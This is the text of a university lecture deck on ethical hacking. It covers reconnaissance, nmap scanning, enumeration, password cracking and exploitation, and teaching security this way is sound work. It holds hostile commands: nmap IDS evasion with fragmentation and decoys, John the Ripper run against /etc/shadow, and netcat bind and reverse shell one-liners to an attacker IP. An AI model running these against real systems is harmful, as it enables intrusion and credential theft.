Dr. Igor Santos

Security of Information Systems

Ethical hacking

2

Contents

¿What is Ethical Hacking? Phases

Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration Vulnerabilities Identification &

Exploitation

3

¿What is Ethical Hacking?

4

Ethical Hacking

A method to evaluate the security of a system or a network of systems by simulating an intruder attack

It shows the actual impact of a vulnerability through controled tests

It searchs for unknown vulnerabilities

5

Ethical Hacking

Information level White Box Black Box

¿Social Engineering?

¿Physical Security?

¿Dangerous Tests? Exploits DoS …

6

Information Gathering

7

Information Gathering

Gather information about the target before the attack Without (too much) contact As much information as possible The information can be very valuable in

the future

More information = More probability of success in the attack

8

Information Gathering

Information we search for: Names and/or Positions of workers E-mail addresses User names Public Addresses, Domains or URLs Used Software and Technologies Internal addresses or URLs Internal PATHs Data about the system configuration

9

Information Gathering

Client and supplier names Physical Location Telephone Number …

Iterative process When information is found, new

searches are performed

10

Information Gathering

Sources Search Engines DNS servers Whois servers Metadata Social Networks P2P networks …

11

Information Gathering Types

Passive Methods The target is not contacted directly ▪ Search Engines▪ Whois▪ …

Active Methods It leaves some trace in the target▪ DNS zone transfer▪ Web site Mirroring▪ …

12

Information Gathering Techniques

Internet Service Registration (whois) Information about IP record and

maintenance

Search Engines Gather public information from

company and workers web sites

13

Information Gathering Techniques

DNS queries Identification of hosts by DNS querying

Web site analysis Intentionally published information, that

may suppose a risk for the security

14

Information Gathering Techniques

New sources!!! Social Networks Metadata P2P networks Work searching websites

15

Search Engines - Google

Google Hacking: Search in Google sensitive information, usually with malicious goals

Johnny Long Google Hacking For Penetration Testers http://www.hackersforcharity.org/ghdb/▪ No mantenida

http://www.exploit-db.com/google-dorks/▪ Continuación!!! (9 nov. 2010)

Cheat-sheet

http://www.sans.org/mentor/GoogleCheatSheet.pdf

16

Search Engines - Google

¿What to look for? Vulnerable applications (e.g.,:

inurl:eStore/index.cgi?) Error Messages (e.g.,: “Warning:

mysql_query()” “invalid query”) Files with sensitive information (e.g.,:

filetype:sql “insert into”) Websites with private reports (e.g.,:

intitle:”Nessus Scan Report”) Web server versions (e.g.,: “Microsoft-IIS/*

server at”, intitle:index.of)

17

Search Engines - Shodan

http://www.shodanhq.com/ A “diferent” search engine If finds systems by performing searches

based on the banner responses▪ Computer search engine

Filters: http://www.shodanhq.com/help/filters

Examples:▪ net:130.206.139.0/24▪ port:22 country:ES

18

Search Engines - Netcraft

Netcraft (http://news.netcraft.com) It shows the following domain

information given a domain▪ OS version. ▪ Web server version▪ Uptime

19

Search Engines

Countermeasures To properly configure the “robots.txt” file▪ This file indicates to search engines what the

must NOT index Periodically audit the web site with these

techniques in order to check that there is no access to sensitive information

20

Social Networks

¿Who does have a profile in Facebook or LinkedIn?

¿Do we know how to handle privacity in social networks?

Social Engineering Create a fake profile in order to obtain access

to private profiles = ¡Lot of information!

Social Network Search Engines▪ http://www.123people.com/▪ http://www.pipl.com/

21

Social Networks

Countermeasures Limit the presence in social networks Don’t publish too much Don’t publish automatically Don’t accept every friendship request

(we may not be the final victim but an attack vector)

22

Metadata

Hidden information regarding a document Author Used Application Date of Creation Camera Model (images) E-mail Addresses …

They enhance the information present in a document

23

Metadata - FOCA

A tool that started by being a metadata extractor and analyzer, now is more than that: Document panel: Searches several types of

documents in Google, Bing and Exaled DNS Search Panel : It uses different

techniques to obtain more domain namesCountermeasures: Metashield

Protector It cleans the metadata from documents

24

Network Mapping & Scanning

25

Network Mapping & Scanning

Several techniques Host discovery Port scanning IDS (Intrusion Detection System) evasion Service and OS identification

(fingerprinting)

26

Network Mapping & ScanningNmap

Tool for network exploration and security auditing

nmap [ <Scan Type> .][<Options> ] { <target specificication> }

Options▪ Scan type: -sS, -sX, -sU, …▪ -p <ports>: ports to scan (separated by a comma

or “-” for range) (to scan all of them –p 0-65535)

27

Network Mapping & Scanning

Zenmap Front-end for nmap It draws a network map with the results Predefined scans

28

Network Mapping & Scanning

Manualhttp://nmap.org/man/es/man-briefoptions.html

Cheat sheethttp://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

Bookhttp://nmap.org/book/

29

Host Discovery

Identify online systems First step for network mapping

Classic method using ping ICMP echo request Alive systems respond to ICMP echo reply

It is also possible to send TCP packets and wait for the response of the online

ARP Ping in local networks

30

Host Discovery

Nmap ping (-sP) ICMP echo request & ICMP timestamp

request TCP ACK packet port 80 TCP SYN packet port 443

Example:nmap –sP 192.168.1.1

31

Port Scanning

One of the most widespread hacking techniques Nmap en Hollywood

http://nmap.org/movies.html

A computer executes several services that listen in tcp/udp ports

By means of scanning, we can locate open ports

32

TCP Port Scanning - TCP Connect scan

TCP Connect scan A TCP connection is established with

the destination port (Three-Way Handshake)

A very reliable method to determine the port state

Simple and easy to detect▪ Generates too much noise

nmap –sT <IP> -p <ports>

33

TCP Port Scanning - TCP Connect scan

Open port

34

TCP Port Scanning - TCP Connect scan

Closed port

35

TCP Port Scanning - TCP Connect scan

Filtered port

36

TCP Port Scanning - SYN Scan

SYN scan If a port listening is found, the full

connection is not established▪ A RST is sent to finalize it

Because Three-Way Handshake is not completed, a lot of system don’t log the connection attempt

A IDS can easily detect it Quick and realiable

nmap –sS <IP> -p <ports>

37

TCP Port Scanning - SYN Scan

Open port

38

TCP Port Scanning - SYN Scan

Closed port

39

TCP Port Scanning - SYN Scan

Filtered port

40

UDP Port Scanning

UDP is a protocal not connection oriented Closed ports return the packet “ICMP

destination unreachable”

If the ICMP traffic is filtered the responsed are not retrieved for the closed ports The port state cannot be determined

conclusively

nmap –sU <IP> -p <ports>

41

UDP Port Scanning

Open/Filtered port

42

UDP Port Scanning

Closed port

43

IDS evasion

Techniques to avoid IDS/IPS Use of fragmented packets▪ Distribution of an IP packet between various

data blocksnmap -sS -f <IP> -p <ports>

Spoofing of origin IPs to emulate multiple attackers▪ Hiding our own IP (attacker)nmap –sS –D <IP1,IP2,…IPN> <attacked_IP> -p <ports>

44

Fingerprinting

Service Fingerprinting Identification of the service listening

in a port TCP/UDPnmap –sV <IP> -p <port>

O.S. Fingerprinting Identification of the Operative

Systemnmap –O <IP>

45

Contramedidas escaneo de red

Disable unnecessary services Close ports

Firewall / IDS / IPS ICMP traffic filtering

46

Enumeration

47

Enumeration

Get information through a network service

What information? System user names Email addresses other systems ...

48

Enumeration

Services FTP: anonymous / Ftp-user-enum TFTP: ¡without authentication! SMTP: VRFY y EXPN commands → smtpenum DNS: Direct/Reverse Lookup y zone transfer HTTP: banner grabbing RPC: edump, rpcdump, rpcinfo NETBIOS: samrdump SNMP: snmpwalk, snmpheck LDAP: Brute force by means of the Guest user

49

Countermeasures - enumeration

Maintain the services updated Disable unnecessary services

50

ATAQUES A CONTRASEÑAS

Passwords Attacks

51

Password Guessing

It is unknown some or all the necessary data to authenticate User (if the Information Gathering phase

has been correctly done, we will have several system users)

Password The password file is known, but it is

encrypted Words are test until the correct one is

found

52

Password Guessing

Systems store a password Hash They do not store clear users'

passwords One-way encryption function It cannot be decrypted▪ http://en.wikipedia.org/wiki/Cryptographic_ha

sh_function

53

Password Guessing

During a pentest we will collect password hashes Bad configurations Successful intrusion

With administrative permission is possible to dump the hashes of the passwords of system users Windows -> SAM Unix -> / etc / passwd, / etc / shadow

54

Attack Types

Dictionary It is based on a list of user names or

passwords Common Words Terms related to the audited Try until the right one is found It should be on the list! Success depends on how good and / or

extensive is the dictionary / pentest / passwords / wordlists

55

Attack Types

Hybrid It uses a dictionary, but variations are

also introduced Examples Try dictionary words in lowercase and

uppercase A is changed by 4, S by 5, E by 3, ...

56

Attack Types

Brute Force Usernames or passwords are generated

within a rank and given a character set▪ Eg max 8 characters [A-Za-z]

57

John the Ripper

Password cracking tool Able to break several algorithms

DES MD5 SHA-1 LM (Lan Manager) ...

You can save a session for later cracking

58

John the Ripper

Single mode Quick test Difficult to have success It uses typical passwords and some

variations

john --single <password_file>

59

John the Ripper

Wordlist Mode It tests with a dictionary file Quick Hybrid attack: --rulesjohn --wordlist=<dictionary> <password_file>

Dictionaries/pentest/passwords/wordlists/

60

John the Ripper

Incremental Mode It tries all possible combinations of

passwords (Brute Force)▪ Only letters (--incremental:alpha)▪ Only numbers (--incremental:digits)▪ Letters, numbers and some special characters (--incremental:lanman)▪ All characters (--incremental:all)

john --incremental:[mode] <password_file>

61

John the Ripper

Show cracked hashes john --show /etc/shadow

62

Other techniques

Shoulder surffing Social Engineering Sniffing

Capture the session logins Physical access

Bypass -> konboot Password cracking 0phcrack live cd (Rainbow

Tables)

63

Vulnerabilities Identification & Exploitation

64

Vulnerabilities Identification & Exploitation

Terminology Vulnerability Exploit (client-side, server-side, …) 0-day exploit Payload CVE (Common Vulnerabilities and

Exposures): http://cve.mitre.org/

65

Lots of vulnerabilities types: Configuration (not design) Input validation Directory Jump Command Injection SQL Injection Cross-site scripting (XSS) Buffer overflow …

Vulnerabilities Identification & Exploitation

66

Vulnerability Search Security Focus▪ http://www.securityfocus.com/vulnerabilities

National Vulnerability Database▪ http://web.nvd.nist.gov/view/vuln/search

CERT▪ http://cert.inteco.es/vulnSearch/Current_News/

Vulnerabilities_1/vulnerability_search/?postAction=getVulns

Microsoft Security Bulletins▪ http://www.microsoft.com/spain/technet/securi

ty/bulletin/ms10-oct.mspx Scanners: Secunia, Nessus, etc.

Vulnerabilities Identification & Exploitation

67

Exploits Search Exploit Database▪ Milw0rm continuation.▪ http://www.exploit-db.com/

Others▪ http://www.securiteam.com/exploits▪ http://securityvulns.com/exploits▪ http://www.web-hack.ru/exploit▪ http://tarantula.by.ru/localroot

Vulnerabilities Identification & Exploitation

68

Metasploit Framework for vulnerbility explotation It help in the development of new

exploits It allows to define▪ What exploit is going to be used▪ Which payload is going to be launched

lanzará▪ Meterpreter: advanced payload without disk access

(DLL Injection) → less forensics evidences.

▪ How is going to be coded (avoiding IDS, etc.)

Vulnerabilities Identification & Exploitation

69

Mantaining the access– Backdoors Tiny Shell: Unix backdoor Hydrogen: backdoor from

Immunitysec▪ It includes robust encryption and traffic

hiding Radmin: Windows backdoor▪ A remote desktop like connection. Very

easy to use and with a lot of functions

Vulnerabilities Identification & Exploitation

70

Netcat: it can be used as backdoor▪Victim (server): nc -lp 4444 –e cmd.exe▪Attacker (client): nc –vv <IP victim> 4444

▪ Also “reverse shell”:▪Attacker (client): nc –vvlp 4444▪Victim (server): nc –vv <IP attacker> 4444 –e cmd.exe

Vulnerabilities Identification & Exploitation

71

References

Images RTVE http://www.flickr.com/photos/anonymous9000/26

63311366 The Matrix, Warner Bros. http://www.flickr.com/photos/venosdale/4412225

367 http://www.flickr.com/photos/melancon/22837190

35